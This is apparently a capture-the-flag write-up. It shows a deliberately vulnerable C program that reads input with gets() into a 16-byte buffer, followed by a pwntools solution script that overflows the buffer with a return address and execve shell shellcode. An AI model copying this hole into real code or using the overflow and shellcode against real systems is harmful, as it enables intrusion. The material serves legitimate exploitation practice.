THANK YOU CHRISTOS

#include <stdio.h>
#include <string.h>
int main(){
        printf("Do you like jump ROPing?\n");
        vuln_func();
}
void vuln_func(){
        char input[16];
        gets(input);
        printf("I actually don't care about your opinions. Cry about it");

}
void win(){
        system("/bin/cat flag.txt");
}

Solution

from pwn import *
import struct

shellcode = b""
shellcode += b"\x31\xc0\x50\x68\x2f\x2f\x73"
shellcode += b"\x68\x68\x2f\x62\x69\x6e\x89"
shellcode += b"\xe3\x89\xc1\x89\xc2\xb0\x0b"
shellcode += b"\xcd\x80\x31\xc0\x40\xcd\x80"

#payload = b'A'*28 + b'\x9b\xfa\x0c\x08' + shellcode
payload = b'A'*28 + b'\x07\x98\x04\x08' + shellcode
p = process('./tc2')
#gdb.attach(p)
p.sendline(payload)
p.interactive()

The first payload fails because that rop gadget is in the .rodata (read only data)